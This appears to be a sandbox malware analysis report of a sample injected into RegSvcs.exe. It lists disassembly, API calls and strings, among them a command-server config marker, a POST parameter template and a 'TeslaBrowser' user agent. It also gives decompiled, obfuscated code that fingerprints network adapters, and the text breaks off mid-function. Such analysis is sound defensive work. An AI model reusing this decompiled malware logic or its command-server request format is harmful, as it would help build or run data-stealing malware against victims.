0x0042d78a
0x0042d75d
0x0042d481
0x0042d9c1
0x0042e1e9
0x0042eca5
0x0042eca7
0x0042ecaa
0x0042ecb2
0x0042ecb4
0x0042ecb4
0x00000000
0x0042ecb2
0x0042e1f4
0x0042e204
0x0042e209
0x0042e20c
0x0042e20c
0x0042d9c7
0x0042d9cc
0x0042e7dd
0x0042e7e4
0x0042e7e8
0x0042e7f0
0x0042e7f5
0x0042e7fa
0x0042e7fb
0x0042e800
0x0042e803
0x0042d9d2
0x0042d9d7
0x0042d9ea
0x0042d9f0
0x0042d9f0
0x0042d9d7
0x0042d9cc
0x00000000
0x0042d9c1
0x0042d48c
0x0042ddfa
0x0042ea0b
0x0042ea0c
0x0042ea0f
0x0042ea1a
0x0042ea20
0x0042ea20
0x00000000
0x0042ea1a
0x0042de05
0x00000000
0x00000000
0x0042de17
0x0042de1d
0x0042de21
0x0042de2a
0x0042de2f
0x0042de32
0x0042de3a
0x00000000
0x00000000
0x00000000
0x0042d492
0x0042d497
0x0042e54e
0x0042d49d
0x0042d4a2
0x0042d4b3
0x0042d4b6
0x0042d4bb
0x0042d4bb
0x0042d4a2
0x00000000
0x0042d497
0x0042d48c
0x0042d395
0x0042d512
0x0042d7e0
0x0042dc70
0x0042e435
0x0042ee2e
0x0042e43b
0x0042e440
0x0042e459
0x0042e45f
0x0042e45f
0x0042e440
0x00000000
0x0042e435
0x0042dc7b
0x0042e945
0x0042e94c
0x0042e951
0x00000000
0x0042e951
0x0042dc86
0x00000000
0x0042dc8c
0x0042dca3
0x0042dcaa
0x0042dcb1
0x0042dcb7
0x0042dcb7
0x00000000
0x0042dcb1
0x0042dc86
0x0042d7eb
0x0042e064
0x0042ebe9
0x0042ebed
0x00000000
0x0042ebed
0x0042e06f
0x00000000
0x00000000
0x0042e07c
0x0042e08f
0x0042e092
0x0042e09d
0x0042e0a3
0x0042e0a3
0x00000000
0x0042e09d
0x0042d7f6
0x0042e6d6
0x0042e6d9
0x0042e6ec
0x0042e6f2
0x0042e6f9
0x00000000
0x0042e6f9
0x0042d801
0x0042d810
0x0042d822
0x0042d825
0x0042d82c
0x0042d832
0x0042d832
0x0042d96f
0x0042d96f
0x0042d96f
0x00000000
0x0042d801
0x0042d51d
0x0042da57
0x0042e268
0x0042ecf9
0x0042ecfc
0x0042e26e
0x0042e273
0x0042e281
0x0042e286
0x0042e289
0x0042e28e
0x0042e28f
0x0042e294
0x0042e299
0x0042e29c
0x0042e2a1
0x0042e2a1
0x0042e273
0x00000000
0x0042e268
0x0042da62
0x0042e830
0x0042e833
0x00000000
0x0042e833
0x0042da6d
0x00000000
0x0042da73
0x0042da7a
0x0042da80
0x0042da83
0x0042da88
0x0042da93
0x0042da99
0x0042da99
0x00000000
0x0042da93
0x0042da6d
0x0042d528
0x0042de77
0x0042ea79
0x0042ea7c
0x0042de7d
0x0042de82
0x0042de8b
0x0042de90
0x0042de93
0x0042de99
0x0042de99
0x0042de82
0x00000000
0x0042de77
0x0042d533
0x0042e570
0x0042e586
0x0042e596
0x0042e59b
0x0042e5a6
0x0042e5ac
0x00000000
0x0042e5ac
0x0042d53e
0x00000000
0x0042d544
0x0042d544
0x0042d569
0x0042d56c
0x0042d573
0x0042d579
0x0042d579
0x00000000
0x0042d573
0x0042d53e
0x0042d3a0
0x0042d6b2
0x0042db69
0x0042e355
0x0042ed7d
0x0042ed7e
0x0042ed83
0x0042ed86
0x0042ed8b
0x0042ed8e
0x0042ed93
0x0042ed96
0x0042ed9b
0x0042ed9e
0x0042eda3
0x0042eda6
0x0042edab
0x0042edae
0x0042edb6
0x0042edb9
0x0042edbc
0x0042edbe
0x0042edc1
0x0042edc2
0x0042edc4
0x0042edc7
0x0042edca
0x0042edcd
0x0042e35b
0x0042e360
0x0042e369
0x0042e372
0x0042e37b
0x0042e381
0x0042e381
0x0042e360
0x00000000
0x0042e355
0x0042db74
0x0042e8c8
0x0042e8da
0x0042e8dd
0x0042e8e4
0x0042e8ea
0x0042e8ea
0x00000000
0x0042e8e4
0x0042db7f
0x00000000
0x00000000
0x0042db8b
0x0042db92
0x0042db95
0x0042db9d
0x00000000
0x0042dba3
0x00000000
0x0042dba3
0x0042db9d
0x0042d6bd
0x0042df74
0x0042eb23
0x0042eb2a
0x0042eb2f
0x0042eb3b
0x0042eb3e
0x0042eb47
0x0042eb51
0x0042eb5b
0x0042eb65
0x0042eb75
0x0042eb7b
0x0042df7a
0x0042df7f
0x0042df90
0x0042df93
0x0042df93
0x0042df7f
0x00000000
0x0042df74
0x0042d6c8
0x0042e62f
0x0042e647
0x0042e64a
0x0042e651
0x0042e657
0x0042e657
0x00000000
0x0042d6ce
0x0042d6d3
0x0042d6dc
0x0042d6e1
0x0042d6e7
0x0042d6f4
0x0042d6f4
0x00000000
0x0042d6d3
0x0042d6c8
0x0042d3ab
0x0042d924
0x0042e187
0x0042ec5e
0x0042ec61
0x0042ec64
0x0042ec6c
0x00000000
0x00000000
0x00000000
0x0042ec6c
0x0042e192
0x0042e198
0x0042e198
0x00000000
0x0042e192
0x0042d92f
0x0042e788
0x0042e78d
0x0042e796
0x0042e79c
0x00000000
0x0042e79c
0x0042d93a
0x00000000
0x0042d940
0x0042d943
0x0042d95e
0x0042d961
0x0042d968
0x0042d96a
0x0042d96a
0x00000000
0x0042d968
0x0042d3b1
0x0042d3b6
0x0042dd87
0x0042e9ce
0x0042e9d7
0x0042e9dd
0x0042dd8d
0x0042dd92
0x0042dd9e
0x0042dda4
0x0042dda4
0x0042dd92
0x0042d3bc
0x0042d3c1
0x0042e50f
0x0042d3c7
0x0042d3cc
0x0042d3de
0x0042d3e4
0x0042d3e4
0x0042d3cc
0x0042d3c1
0x00000000
0x0042d3b6
0x0042d3ab

APIs

GetProcAddress.KERNEL32(?,?), ref: 0042D3D8
InternetReadFile.WININET(?,?,?,?), ref: 0042D9AA
GetModuleHandleW.KERNEL32(?), ref: 0042D9E4
InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0042DCEA
_strlen.LIBCMT ref: 0042DF3A
HttpSendRequestA.WININET(?,Content-Type: application/x-www-form-urlencoded,0000002F,?,00000000), ref: 0042DF56
InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0042E338
GetProcAddress.KERNEL32(?,?), ref: 0042E453
HttpOpenRequestW.WININET(?,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E531
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0042ECA5

Strings

J], xrefs: 0042EA20
E+3], xrefs: 0042D5D5
@T>, xrefs: 0042D4E8
Z2wKCn--installs2p, xrefs: 0042DF1F
V}6F, xrefs: 0042D4D2
E+3], xrefs: 0042E016
Load, xrefs: 0042D883
c2conf, xrefs: 0042D452
Content-Type: application/x-www-form-urlencoded, xrefs: 0042DF4E
J], xrefs: 0042DC22
aryW, xrefs: 0042D86F
Libr, xrefs: 0042D879
W}6F, xrefs: 0042E424
J], xrefs: 0042D79A
HttpOpenRequestW, xrefs: 0042E58E
lid=%s&j=%s&ver=4.0, xrefs: 0042EC7E
wininet.dll, xrefs: 0042EB1E
kernel32.dll, xrefs: 0042EE3C
InternetOpenW, xrefs: 0042EB65, 0042EB6B
InternetConnectA, xrefs: 0042E1FC
POST, xrefs: 0042E529
HttpSendRequestA, xrefs: 0042E483
InternetCloseHandle, xrefs: 0042E568
W}6F, xrefs: 0042DA07
default, xrefs: 0042DF1A
InternetReadFile, xrefs: 0042E780

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: Internet$AddressAvailableDataHttpOpenProcQueryRequest$FileHandleModuleReadSend_strlen
String ID: @T>$Content-Type: application/x-www-form-urlencoded$E+3]$E+3]$HttpOpenRequestW$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenW$InternetReadFile$Libr$Load$POST$V}6F$W}6F$W}6F$Z2wKCn--installs2p$aryW$c2conf$default$kernel32.dll$lid=%s&j=%s&ver=4.0$wininet.dll$J]$J]$J]
API String ID: 1477228150-1572957434
Opcode ID: 3049ca2aea3d350dabe8f2145dc82fb126b1cc8adc12b0c4f1585d3d696e14e2
Instruction ID: d17876f63778364c83200f8d46ca6084b4efd7a05f50a26b4dd3575fbea7c651
Opcode Fuzzy Hash: 3049ca2aea3d350dabe8f2145dc82fb126b1cc8adc12b0c4f1585d3d696e14e2
Instruction Fuzzy Hash: 9ED2D6B0F00229CBDF24CB99E9856BEBBB0AB54304FA4055BE515EA350D73CDA41CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00407AC0 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 513fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407F24
CloseHandle.KERNEL32(?), ref: 00407F2E
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00407FD5
CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00407FF7
GetFileSizeEx.KERNEL32(?,?), ref: 0040829E
FindCloseChangeNotification.KERNELBASE(?), ref: 0040833C
ExitProcess.KERNEL32 ref: 004083D4

Strings

\&T!, xrefs: 00407F94
\&T!, xrefs: 00407C3C
[&T!, xrefs: 00407C26

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: File$Close$ChangeCreateExitFindHandleModuleNameNotificationProcessReadSize
String ID: [&T!$\&T!$\&T!
API String ID: 394432249-1060882007
Opcode ID: 15b2847e2fb028cac8143553b83c90e430cb1427509ad14c3b3c67f06e79cf17
Instruction ID: 3531fbaf63b2c687377c3281c8ed16b09ecb93cdc376fa849b72b6149dd62f0a
Opcode Fuzzy Hash: 15b2847e2fb028cac8143553b83c90e430cb1427509ad14c3b3c67f06e79cf17
Instruction Fuzzy Hash: 10129271A0C7019FC7248F58C69452FB6E0BB94710F24C93FF48AE63A1D678E9469B4B

Uniqueness

Uniqueness Score: -1.00%

Function 00431849 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00431849() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00431973); // executed
				return _t1;
			}

0x0043184e
0x00431854

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00031973,004312C3), ref: 0043184E

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c2a15a8be31debc44ebb39804725e74767d584a01ba43ddd69759f5cd6e8bb96
Instruction ID: f5f4e62422caf3cd55fc5c510cba1f507cc495de71509b58b805f47517103800
Opcode Fuzzy Hash: c2a15a8be31debc44ebb39804725e74767d584a01ba43ddd69759f5cd6e8bb96
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00419905 Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 379
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WinHttpCloseHandle.WINHTTP(?), ref: 00419A11
WinHttpCloseHandle.WINHTTP(?), ref: 00419A8F
WinHttpConnect.WINHTTP(?,?,00000050,00000000), ref: 00419BAF
WinHttpCloseHandle.WINHTTP(?), ref: 00419D47
WinHttpOpenRequest.WINHTTP(?,GET,00000000,00000000,00000000,00000000,00000000), ref: 00419D9F

Strings

GET, xrefs: 00419D96
TeslaBrowser/5.5, xrefs: 00419E40
@T>, xrefs: 00419A75

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: Http$CloseHandle$ConnectOpenRequest
String ID: @T>$GET$TeslaBrowser/5.5
API String ID: 3656649862-1970910072
Opcode ID: 95431c51960cabe7ae5ca89b60dc9c2d430815199d650cdb0075d4b764009bd8
Instruction ID: a1aa796128f318d1cc6ed54b214fa60d83f2b8e877c894a516175219d99c5f52
Opcode Fuzzy Hash: 95431c51960cabe7ae5ca89b60dc9c2d430815199d650cdb0075d4b764009bd8
Instruction Fuzzy Hash: 08D191F0918304AFDB259F19CAA56AEBAE4AB94314F140C1FF585D73A0D238CCC59B5B

Uniqueness

Uniqueness Score: -1.00%

Function 004477F0 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004477F0(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x46156c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0043DC9B();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0043C326())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00445A20(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x004477f6
0x004477fb
0x00447809
0x00447809
0x0044780f
0x00447811
0x00447811
0x00447828
0x00447831
0x00447839
0x00000000
0x00000000
0x00447819
0x0044781b
0x0044783d
0x00447842
0x00447848
0x00000000
0x00447848
0x0044781e
0x00447824
0x00447826
0x00000000
0x00000000
0x00447826
0x00000000
0x00447828
0x00447801
0x00447807
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,004448D1,00000001,00000364,00000006,000000FF,?,?,?,00434DF5,FFFFFF09,?), ref: 00447831

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1b03992601e815290dbe3500a9f6a2731aa51989e81f181232c60a367a51e532
Instruction ID: 58011561c7a73b206c9722669a5fb5e5e54d47944b994e38eaf4e924904931ae
Opcode Fuzzy Hash: 1b03992601e815290dbe3500a9f6a2731aa51989e81f181232c60a367a51e532
Instruction Fuzzy Hash: B9F0B43160812467FF217A26DC09E5B7758EF81760B15A023B805E6290DB78D803C6FD

Uniqueness

Uniqueness Score: -1.00%

Function 004257F6 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 00425807

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b4df210430da4f580cf38a42cd575b0080df78f68812acd7c2291dfaf1f2d1bc
Instruction ID: 70bbb6a20bc30dca38545765552917f0833ec08005225fda5c41d12912f7f1d0
Opcode Fuzzy Hash: b4df210430da4f580cf38a42cd575b0080df78f68812acd7c2291dfaf1f2d1bc
Instruction Fuzzy Hash: BEA01220A84200A5C05033B2580737C14100F9030FF40001EF002544D34C980140052F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041DAD0 Relevance: 18.1, APIs: 2, Strings: 8, Instructions: 642
COMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E0041DAD0() {
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr* _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				signed int _v216;
				intOrPtr _v220;
				char _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				intOrPtr _v240;
				unsigned int _v244;
				signed int _v248;
				void* __edi;
				intOrPtr _t137;
				intOrPtr _t140;
				intOrPtr _t148;
				signed int _t163;
				signed int _t179;
				intOrPtr _t201;
				intOrPtr _t207;
				signed int _t209;
				signed int _t217;
				intOrPtr _t219;
				char* _t222;
				signed int _t225;
				intOrPtr _t237;
				signed int _t245;
				char* _t247;
				signed int _t249;
				signed int _t252;
				unsigned int _t254;
				signed int _t255;
				unsigned int _t257;
				signed int _t259;
				intOrPtr _t261;
				intOrPtr _t263;
				signed int _t267;
				signed int _t270;
				unsigned int _t272;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				signed int _t289;
				signed int _t291;
				signed int _t295;
				signed int _t303;
				intOrPtr* _t304;
				signed int _t305;
				intOrPtr* _t306;

				_t306 =  &_v236;
				 *_t306 = 0x204b3ed8;
				_v228 = _v192;
				_v240 = _v188;
				_t305 = _v184;
				_t304 = _v180;
				_t303 = _v176;
				while(1) {
					_t137 =  *_t306;
					if(_t137 <= 0xda8ad0c) {
					}
					L2:
					if(_t137 <= 0xd40623c9) {
						if(_t137 > 0xa53e1552) {
							if(_t137 <= 0xbe8bd99f) {
								if(_t137 == 0xa53e1553) {
									_t252 = (_v248 << 0xd) + 0xfff88000;
									_v248 = _t252;
									E00405CD8();
									E0041F0BB(_t296);
									_t140 = 0x2154265c;
									if(_t252 <= 0) {
										L163:
										 *_t306 = _t140;
										continue;
									}
									L151:
									_t140 = 0xf2bf8b37;
									goto L163;
								}
								if(_t137 == 0xab26b6ce) {
									E0041E67B(_t137, _v152, 3, L"%02X", _v156);
									_t306 = _t306 + 0x10;
									_v200 = _v216 + 1;
									 *_t306 = 0x8dbaef5b;
								} else {
									if(_t137 == 0xb215b350) {
										_v160 = _t306 + _v164 * 2 + 0x6c;
										 *_t306 = 0x2154265c;
									}
								}
								continue;
							} else {
								if(_t137 > 0xca7d9611) {
									if(_t137 == 0xca7d9612) {
										_push(_v212);
										_t201 = E0043F9A4();
										_t306 = _t306 + 4;
										_v236 = _t201;
										 *_t306 = 0xe3a20264;
									} else {
										if(_t137 == 0xcdfae9e1) {
											_v248 = _v248 * 0x6f708;
											E0041F094(E0041E6DB());
											 *_t306 = 0xb215b350;
										}
									}
								} else {
									if(_t137 == 0xbe8bd9a0) {
										_v244 = _v244 * 0x05200000 | 0x00002640;
										 *_t306 = 0x6fa4c2e4;
										_t303 = _v208;
									} else {
										if(_t137 == 0xc92049e7) {
											_push(0x1000);
											_push(1);
											_t207 = E0043EBC9();
											_t306 = _t306 + 8;
											_v232 = _t207;
											 *_t306 = 0x8a7477c9;
										}
									}
								}
								while(1) {
									_t137 =  *_t306;
									if(_t137 <= 0xda8ad0c) {
									}
									goto L13;
								}
								goto L2;
							}
						}
						if(_t137 <= 0x8e8d4c6e) {
							if(_t137 == 0x852c33ef) {
								_t276 = (_v248 + 0x82 >> 7) + 0xffffff2f;
								_v248 = _t276;
								_t140 = 0xe183f7d2;
								if(_t276 >= 0x9a) {
									_t140 = 0xca7d9612;
								}
								goto L163;
							}
							if(_t137 == 0x8a7477c9) {
								_t209 = _v244;
								_t278 = _t209 * 0xc765 * _t209 * 0xc765;
								_t296 = _t278 * 0x22a1 - 1;
								_v244 = _t209 * 0x18eca;
								_t140 = 0xe88c259a;
								if(_t278 * 0x22a1 - 1 != _t278) {
									_t140 = 0x71c5912e;
								}
								goto L163;
							}
							if(_t137 != 0x8dbaef5b) {
								continue;
							} else {
								_t279 = _v244 * 0xf7;
								_t280 = _t279 * _t279;
								_t296 = _t280 * 0x4883 - 1;
								_v244 = 0x39ce000 + (_t279 + 0x7fff84 >> 4) * 0x62000;
								_t140 = 0x39b38a12;
								if(_t280 != _t280 * 0x4883 - 1) {
									_t140 = 0xe8b92922;
								}
								goto L163;
							}
						}
						if(_t137 > 0x99952f50) {
							if(_t137 == 0x99952f51) {
								_v216 = _t305;
								 *_t306 = 0x603edea5;
							} else {
								if(_t137 == 0x9a29c658) {
									 *_t306 = 0x1ab0e90e;
								}
							}
							continue;
						}
						if(_t137 == 0x8e8d4c6f) {
							_t283 = (_v248 << 9) + 0xfffff300;
							_v248 = _t283;
							_t140 = 0xd40623ca;
							if(_t283 >= 0x88) {
								_t140 = 0x2154265c;
							}
							goto L163;
						} else {
							if(_t137 == 0x934be26f) {
								_t217 = _v244 + 0x62 >> 4;
								_t285 = _t217 * _t217;
								_t296 = _t285 * 0x8795 - 1;
								_v244 = _t217 + 0xf8;
								_t219 = 0x8e8d4c6f;
								if(_t285 * 0x8795 - 1 != _t285) {
									_t219 = 0xd91beb26;
								}
								 *_t306 = _t219;
								_t304 = _v204;
							}
							continue;
						}
					}
					if(_t137 <= 0xe7ed2c97) {
						if(_t137 <= 0xdee81454) {
							if(_t137 == 0xd40623ca) {
								_t254 = _v248 * 0x16d5 >> 0xe;
								_v248 = _t254;
								_push(0x7e1);
								_push(_t254);
								E0041E67B(E0041E67B(_t137), 0x47d2, 0x6ef, _t254, 0x5d8a);
								_t306 = _t306 + 0x18;
								_t140 = 0xe7685976;
								if(_t254 != 3) {
									goto L151;
								}
								goto L163;
							}
							if(_t137 == 0xd7df6f29) {
								_t222 =  &_v224;
								__imp__GetAdaptersInfo(_v236, _t222);
								_v180 = _t222;
								 *_t306 = 0x5577d6d4;
							} else {
								if(_t137 == 0xd91beb26) {
									_v196 = _t304;
									 *_t306 = 0x79499e71;
								}
							}
							continue;
						}
						if(_t137 > 0xe3a20263) {
							if(_t137 == 0xe3a20264) {
								_t225 = _v244 + 0x27 >> 0xf;
								_t270 = _t225 * _t225;
								_t296 = _t270 * 0x48e3 - 1;
								_v244 = (_t225 << 7) + 0xffffc080;
								_t140 = 0x23667d06;
								if(_t270 * 0x48e3 - 1 != _t270) {
									_t140 = 0xd7df6f29;
								}
								goto L163;
							}
							if(_t137 != 0xe7685976) {
								continue;
							}
							_t255 = (0x00000690 + _v248 * 0x00000008 >> 0x00000001 & 0x0007fff8) * 0xe8000;
							_v248 = _t255;
							E0041E6DB();
							_t140 = 0xca7d9612;
							if(_t255 != 0) {
								_t140 = 0xb215b350;
							}
							goto L163;
						}
						if(_t137 == 0xdee81455) {
							 *_t306 = 0x4616c898;
							continue;
						}
						if(_t137 != 0xe183f7d2) {
							continue;
						} else {
							_t272 = 0xffffffc3 + _v248 * 0x7a;
							_v248 = _t272 >> 4;
							_t140 = 0x614631bb;
							if(_t272 < 0xe50) {
								_t140 = 0x16135bf7;
							}
							goto L163;
						}
					}
					if(_t137 > 0xf46168c6) {
						if(_t137 > 0x60ca633) {
							if(_t137 != 0x64d2d51) {
								if(_t137 != 0x60ca634) {
									continue;
								}
								_t263 = _v228;
								_v192 = _t263;
								_v188 = _v240;
								_v184 = _t305;
								_v180 = _t304;
								_v176 = _t303;
								return _t263;
							}
							_t140 = 0x56fb1c8d;
							if(_v204 != 0) {
								_t140 = 0x934be26f;
							}
							goto L163;
						}
						if(_t137 == 0xf46168c7) {
							_t267 = _v248 + 0x00000063 & 0xffffff80 | 0x00000020;
							_v248 = _t267;
							_t140 = 0x2154265c;
							if(_t267 >= 0x99) {
								_t140 = 0x435e3da1;
							}
							goto L163;
						} else {
							if(_t137 == 0xfc8aaaee) {
								_t237 = 0xdee81455;
								if(_v200 != 8) {
									_t237 = 0x99952f51;
								}
								 *_t306 = _t237;
								_t305 = _v200;
							}
							continue;
						}
					} else {
						if(_t137 > 0xe8b92921) {
							if(_t137 == 0xe8b92922) {
								 *_t306 = 0xfc8aaaee;
							} else {
								if(_t137 == 0xf2bf8b37) {
									_v156 =  *(_v196 + _v216 + 0x194) & 0x000000ff;
									_v152 = _t306 + _v216 * 4 + 0x6c;
									 *_t306 = 0xab26b6ce;
								}
							}
						} else {
							if(_t137 == 0xe7ed2c98) {
								_t245 = (_v248 << 0xb) + 0xfffb2713;
								_v248 = _t245;
								_push(0x115);
								_push(_t245);
								_push(0x564a);
								E0041E67B(_t245);
								_t306 = _t306 + 0xc;
								 *_t306 = 0xc92049e7;
							} else {
								if(_t137 == 0xe88c259a) {
									_t247 =  &_v224;
									__imp__GetAdaptersInfo(0, _t247);
									_v220 = _v232;
									_t261 = 0x359a4a84;
									if(_v220 == 0) {
										_t261 = 0x60ca634;
									}
									if(_t247 != 0x6f) {
										_t261 = 0x60ca634;
									}
									 *_t306 = _t261;
									_v236 = 0;
								}
							}
						}
						continue;
					}
					L13:
					if(_t137 > 0x4861e6c2) {
						if(_t137 > 0x615b110e) {
							if(_t137 <= 0x6fa4c2e3) {
								if(_t137 == 0x615b110f) {
									_t249 = 0xae + _v248 * 0x9d;
									_v248 = _t249;
									E0041E6BA(_t137);
									E0041E6DB();
									_t140 = 0x709e7a25;
									if(_t249 >= 0x32) {
										_t140 = 0xcdfae9e1;
									}
									goto L163;
								}
								if(_t137 == 0x66024f5d) {
									_v244 = _v244 << 0x00000007 & 0x0ffffc00;
									 *_t306 = 0x56fb1c8d;
								} else {
									if(_t137 == 0x6d604315) {
										_v248 = (_v248 >> 0xf) + 0x96;
										 *_t306 = 0xb215b350;
									}
								}
							} else {
								if(_t137 > 0x71c5912d) {
									if(_t137 == 0x71c5912e) {
										 *_t306 = 0x435e3da1;
									} else {
										if(_t137 == 0x79499e71) {
											_push("_");
											_push(0x800);
											E00443437(_v232);
											_t306 = _t306 + 0xc;
											 *_t306 = 0xeec6e15;
										}
									}
								} else {
									if(_t137 == 0x6fa4c2e4) {
										_v220 = _t303;
										 *_t306 = 0xda8ad0d;
									} else {
										if(_t137 == 0x709e7a25) {
											_t148 = 0xc92049e7;
											if(_v172 != 0) {
												_t148 = 0x191d7f5e;
											}
											 *_t306 = _t148;
											_v240 = 0;
										}
									}
								}
							}
							continue;
						}
						if(_t137 <= 0x59b82ec2) {
							if(_t137 == 0x4861e6c3) {
								E0043F602(_v236);
								_t306 = _t306 + 4;
								 *_t306 = 0x60ca634;
								_v228 = _v148;
							} else {
								if(_t137 == 0x5577d6d4) {
									_v244 = ((_v244 >> 8) + (_v244 >> 8) + 0xfffffe94 >> 8) * 0x6a6c;
									 *_t306 = 0x709e7a25;
								} else {
									if(_t137 == 0x56fb1c8d) {
										 *_t306 = 0x191d7f5e;
										_v240 = _v232;
									}
								}
							}
							continue;
						}
						if(_t137 > 0x603edea4) {
							if(_t137 == 0x603edea5) {
								 *_t306 = 0xf2bf8b37;
							} else {
								if(_t137 == 0x614631bb) {
									_v168 =  *(_v236 + _v220 + 0x194) & 0x000000ff;
									_v164 = _v220 + _v220;
									 *_t306 = 0xb215b350;
								}
							}
							continue;
						}
						if(_t137 == 0x59b82ec3) {
							_t289 = (_v248 << 0xd) + 0xffffff3c;
							_v248 = _t289;
							_t140 = 0xa53e1553;
							if(_t289 >= 0xb8) {
								_t140 = 0x6d604315;
							}
							goto L163;
						}
						if(_t137 != 0x5b1bebb4) {
							continue;
						} else {
							_t163 = _v244 >> 7;
							_v244 = _t163;
							_t291 = _t163 * _t163;
							_t296 = _t291 * 0xa9 - 1;
							_t140 = 0x852c33ef;
							if(_t291 != _t291 * 0xa9 - 1) {
								_t140 = 0x9a29c658;
							}
							goto L163;
						}
					}
					if(_t137 > 0x2154265b) {
						if(_t137 <= 0x374a509a) {
							if(_t137 == 0x2154265c) {
								E0041E67B(_t137, _v160, 3, L"%02X", _v168);
								_t306 = _t306 + 0x10;
								_v208 = _v220 + 1;
								_t140 = 0x5b1bebb4;
								if(_v208 != 8) {
									_t140 = 0xbe8bd9a0;
								}
								goto L163;
							}
							if(_t137 == 0x23667d06) {
								_t257 = _v248 + 0xb5;
								_v248 = _t257 >> 9;
								E0041E6BA(_t257 >> 9);
								E00405CD8();
								_t140 = 0xe88c259a;
								if(_t257 < 0xf400) {
									_t140 = 0x204b3ed8;
								}
								goto L163;
							}
							if(_t137 == 0x359a4a84) {
								 *_t306 = 0xca7d9612;
							}
							continue;
						}
						if(_t137 > 0x435e3da0) {
							if(_t137 == 0x435e3da1) {
								E004343A0(_t303,  &_v144, 0, 0x80);
								_t306 = _t306 + 0xc;
								 *_t306 = 0x6fa4c2e4;
								_t303 = 0;
							} else {
								if(_t137 == 0x4616c898) {
									_push( &_v144);
									_push(0x800);
									E00443437(_v232);
									_t306 = _t306 + 0xc;
									_v204 =  *_v196;
									 *_t306 = 0x374a509b;
								}
							}
							continue;
						}
						if(_t137 == 0x374a509b) {
							_t179 = _v244 + 0x98;
							_t295 = _t179 * _t179;
							_t296 = _t295 * 0x29b - 1;
							_v244 = (_t179 << 6) + (_t179 << 6) * 2;
							_t140 = 0xf46168c7;
							if(_t295 * 0x29b - 1 != _t295) {
								_t140 = 0x64d2d51;
							}
							goto L163;
						}
						if(_t137 != 0x39b38a12) {
							continue;
						} else {
							_t259 = 0x8feec + _v248 * 0x18c0;
							_v248 = _t259;
							E0041F094(E0041F094(_t137));
							_t140 = 0x59b82ec3;
